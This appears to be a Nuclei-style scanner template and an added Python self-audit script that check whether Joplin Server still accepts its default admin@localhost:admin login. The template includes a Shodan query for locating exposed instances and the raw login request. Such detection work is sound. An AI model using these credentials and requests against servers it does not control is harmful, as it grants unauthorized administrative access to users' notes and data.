Joplin Server installations are vulnerable to default administrative credentials. The system ships with a default admin account using the credentials admin@localhost:admin. Attackers can leverage these default credentials to gain administrative access to the Joplin Server instance, potentially compromising sensitive user data and system functionality.
PoC code [public]
id: joplin-default-login

info:
  name: Joplin - Default Login
  author: pussycat0x
  severity: high
  description: |
    Joplin Server installations are vulnerable to default administrative credentials. The system ships with a default admin account using the credentials admin@localhost:admin. Attackers can leverage these default credentials to gain administrative access to the Joplin Server instance, potentially compromising sensitive user data and system functionality.
  metadata:
    verified: true
    shodan-query: 'title:"Joplin Server"'
    max-request: 1
  tags: joplin,oss,default-login,vuln

variables:
  username: admin@localhost
  password: admin

http:
  - raw:
      - |
        POST /api/sessions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "email": "{{username}}",
          "password": "{{password}}"
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"user_id","id")'
          - 'contains(content_type,"application/json")'
        condition: and
# digest: 490a00463044022022de2b1b75e25e9b2345f08ddb1391df037c97ebe452d5c78f743c9dee5a2b83022003c11511b58c096898cc129e7990455b5d92f4017e647ccf4c404cf7a66bf4d3:922c64590222798bb761d5b6d8e72950
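The same request and matcher logic as a self-audit script, added here as an example (not part of the template or the Joplin project), so an operator can confirm that a Joplin Server they run no longer accepts the shipped admin@localhost:admin account. The injected `post` callable, the `http://` scheme and the canned response bodies are assumptions so the check runs offline.

```python
"""Added example (not part of the original template): a self-audit helper that
re-implements the template's check so an operator can confirm that their own
Joplin Server no longer accepts the shipped admin@localhost:admin credentials.
The HTTP transport is injected (the `post` callable is an assumption, not a
Joplin API) so the logic runs offline against constructed responses."""
import json
from typing import Callable, Dict, Tuple

DEFAULT_EMAIL = "admin@localhost"  # values from the template's `variables` block
DEFAULT_PASSWORD = "admin"

# A response is modelled as (status_code, headers, body) so the example stays offline.
Response = Tuple[int, Dict[str, str], str]
PostFn = Callable[[str, Dict[str, str], str], Response]


def build_login_request(hostname: str, email: str = DEFAULT_EMAIL,
                        password: str = DEFAULT_PASSWORD) -> Tuple[str, Dict[str, str], str]:
    """Mirror the template's raw request: POST /api/sessions with a JSON body."""
    url = f"http://{hostname}/api/sessions"  # scheme is an assumption
    headers = {"Host": hostname, "Content-Type": "application/json"}
    body = json.dumps({"email": email, "password": password})
    return url, headers, body


def matches_default_login(resp: Response) -> bool:
    """Apply the template's three DSL matchers joined with `condition: and`."""
    status, headers, body = resp
    content_type = headers.get("Content-Type", "")
    return (status == 200
            and all(token in body for token in ("user_id", "id"))  # contains_all(body, ...)
            and "application/json" in content_type)                 # contains(content_type, ...)


def audit_default_credentials(hostname: str, post: PostFn) -> bool:
    """Return True when the server still issues a session for the default credentials."""
    url, headers, body = build_login_request(hostname)
    return matches_default_login(post(url, headers, body))


# Constructed sample responses for offline use; their shape is assumed, not captured output.
SESSION_CREATED: Response = (200, {"Content-Type": "application/json"},
                             '{"id": "CONSTRUCTED-SESSION", "user_id": "CONSTRUCTED-USER"}')
LOGIN_REJECTED: Response = (403, {"Content-Type": "application/json"},
                            '{"error": "Invalid username or password"}')

if __name__ == "__main__":
    for label, canned in (("still default", SESSION_CREATED), ("rotated", LOGIN_REJECTED)):
        print(label, audit_default_credentials("joplin.example.internal", lambda *_: canned))
```

Note that `contains_all(body,"user_id","id")` is satisfied by any body containing `user_id`, since `id` is a substring of it; the status and content-type conditions are what keep a generic error page from matching.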